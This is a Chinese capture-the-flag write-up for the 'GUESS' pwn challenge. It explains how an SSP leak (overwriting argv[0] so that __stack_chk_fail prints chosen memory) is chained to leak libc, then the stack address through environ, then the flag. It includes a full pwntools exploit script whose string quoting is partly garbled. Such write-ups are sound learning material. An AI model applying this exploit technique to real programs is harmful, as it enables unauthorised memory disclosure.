pwn-GUESS

Posted aiden-

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pwn-GUESS相关的知识,希望对你有一定的参考价值。

参考了其他wp之后才慢慢做出来的 记录一下

首先checksec一下 有canary

技术分享图片

放到IDA看下源码

技术分享图片

运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary

本题用的是SSP leak,当canary被覆盖是就会触发__stack_chk_fail函数,其中会打印字符串argv[0],覆盖它就能实现任意地址读

技术分享图片

源码中有open("./flag.txt")即已经读到缓冲区,需要打印buf中flag值

思路:有三次输入机会(提前计算出offset)

1:利用puts函数leak出libc基地址

2:计算出stack上的环境变量environ的实际地址

3:算出environ与buf中flag的偏移量,打印flag

其中,断点打在gets函数和environ变量上

技术分享图片

技术分享图片

可以算出buf与environ的差值:0x7fffffffe018 - 0x7fffffffdeb0 = 0x168

exp:

 

from pwn import *


elf = ELF(./GUESS)
libc = ELF(./libc6_2.19-0ubuntu6.14_amd64.so)




def get_offset():
        for i in range(0x80,0x180):
                p = elf.process()
                p.recvuntil(flag
)
                p.sendline(1*i+p64(0x0400C90))
                p.recvline()
                x = p.recvline()
                p.close()
                if "six" in x:
                        print hex(i),x
                        exit(0)


def leak_data(p,addr):
        p.recvuntil("flag
")
        p.sendline("1" * 0x128 + p64(addr) )
        p.recvuntil(***: )

def leak_address(p,address):
        leak_data(p,address)
        leak = u64(p.recv(6) + x00 * 2)
        return leak


p = elf.process()

#1:

libc_address = leak_address(p,elf.got[puts]) - libc.symbols[puts]
info(libc:  + hex(libc_address))


#2:
environ_address = libc.symbols[environ] + libc_address
environ = leak_address(p,environ_address)
info(stack address :  + hex(environ))


#3:
flag_address = environ - 0x168
leak_data(p,flag_address)
print p.recvline()

 

以上是关于pwn-GUESS的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段——CSS选择器

谷歌浏览器调试jsp 引入代码片段,如何调试代码片段中的js

片段和活动之间的核心区别是啥?哪些代码可以写成片段?

VSCode自定义代码片段——.vue文件的模板

VSCode自定义代码片段6——CSS选择器

VSCode自定义代码片段——声明函数